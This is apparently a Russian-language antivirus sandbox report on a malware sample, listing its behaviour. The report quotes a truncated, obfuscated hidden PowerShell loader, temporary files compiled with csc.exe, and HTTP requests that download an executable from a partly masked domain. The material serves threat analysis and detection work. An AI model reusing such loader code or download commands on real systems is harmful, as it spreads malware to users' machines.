Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function k7b746 {param($feb331)$h63bed='n3e8f9';$he6712='';for ($i=0; $i -lt $feb331.length;$i+=2){$o58ea=[convert]::ToByte($feb331.Substring($i,2),16);$he6712+=[char]($o5...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\viv_azby.0.cs
- %TEMP%\viv_azby.cmdline
- %TEMP%\viv_azby.out
- %TEMP%\csc9c8a.tmp
- %TEMP%\res9c9a.tmp
- %TEMP%\viv_azby.dll
Удаляет следующие файлы
- %TEMP%\res9c9a.tmp
- %TEMP%\csc9c8a.tmp
- %TEMP%\viv_azby.out
- %TEMP%\viv_azby.dll
- %TEMP%\viv_azby.0.cs
- %TEMP%\viv_azby.pdb
- %TEMP%\viv_azby.cmdline
Сетевая активность
TCP
Запросы HTTP GET
- http://ra###ech.club/_output3592A60.exe
- http://www.ra###ech.club/_output3592A60.exe
UDP
- DNS ASK ra###ech.club
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\viv_azby.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9C9A.tmp" "%TEMP%\CSC9C8A.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\viv_azby.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9C9A.tmp" "%TEMP%\CSC9C8A.tmp"
